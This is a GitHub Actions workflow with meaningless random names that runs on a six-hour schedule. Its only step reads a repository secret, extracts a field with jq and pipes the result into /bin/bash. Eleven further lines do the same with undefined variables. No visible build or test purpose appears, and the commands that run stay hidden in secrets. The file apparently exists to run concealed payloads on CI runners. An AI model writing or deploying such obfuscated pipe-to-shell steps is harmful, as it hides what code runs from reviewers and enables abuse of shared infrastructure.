name: fengdouou4567

on:
  workflow_dispatch:
  schedule:
    - cron: '36 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fengdouou4567
        env:
          jw4: ${{ secrets.jw4 }}
        run: |
          echo $jw4 | jq -r .jftgo360 | /bin/bash
          echo $x5 | jq -r .wtp14854 | /bin/bash
          echo $tna19735 | jq -r .tbwx87 | /bin/bash
          echo $xcrtr5581 | jq -r .tbpd310 | /bin/bash
          echo $zb62250 | jq -r .yi5369 | /bin/bash
          echo $mbyt116 | jq -r .d07402 | /bin/bash
          echo $rctoq538 | jq -r .adrd214 | /bin/bash
          echo $menl7787 | jq -r .wj69996 | /bin/bash
          echo $w052 | jq -r .lpf8860 | /bin/bash
          echo $ycs52153 | jq -r .yv9701 | /bin/bash
          echo $h68 | jq -r .yd56791 | /bin/bash
          echo $bzp23 | jq -r .hpp5191 | /bin/bash

